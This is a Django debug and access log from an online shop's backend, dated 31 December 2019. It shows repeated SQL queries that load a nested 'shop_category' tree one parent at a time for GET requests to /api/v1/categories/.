2019-12-31 21:15:30,510 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 21:15:30,513 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 21:15:30,515 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 21:15:30] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 21:15:34,331 utils 2749 140297212245760 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 21:15:34,342 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:15:34,348 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 21:15:34,352 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:15:34,358 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 21:15:34,362 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 21:15:34,366 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 21:15:34,370 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 21:15:34,374 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 21:15:34,380 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 21:15:34,385 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 21:15:34,388 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 21:15:34,392 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 21:15:34,396 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 21:15:34,402 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 21:15:34,406 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 21:15:34,410 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 21:15:34,414 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 21:15:34,418 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 21:15:34,425 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 21:15:34,429 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 21:15:34,433 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 21:15:34,437 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 21:15:34,441 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 21:15:34,445 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 21:15:34,451 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 21:15:34,456 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 21:15:34,460 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 21:15:34,464 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 21:15:34,468 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 21:15:34,473 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 21:15:34,478 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 21:15:34,482 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 21:15:34,486 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 21:15:34,490 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 21:15:34,496 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 21:15:34,500 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 21:15:34,504 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 21:15:34,508 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 21:15:34,512 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 21:15:34,516 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 21:15:34,521 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 21:15:34,525 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 21:15:34,529 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 21:15:34,534 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 21:15:34,538 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 21:15:34] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 21:16:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 21:21:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 21:25:27,412 utils 2749 140297212245760 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 21:25:27,418 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:25:27,422 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 21:25:27,424 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:25:27,427 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 21:25:27,429 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 21:25:27,432 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 21:25:27,434 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 21:25:27,436 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 21:25:27,439 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 21:25:27,441 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 21:25:27,444 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 21:25:27,446 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 21:25:27,448 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 21:25:27,451 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 21:25:27,453 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 21:25:27,455 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 21:25:27,458 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 21:25:27,460 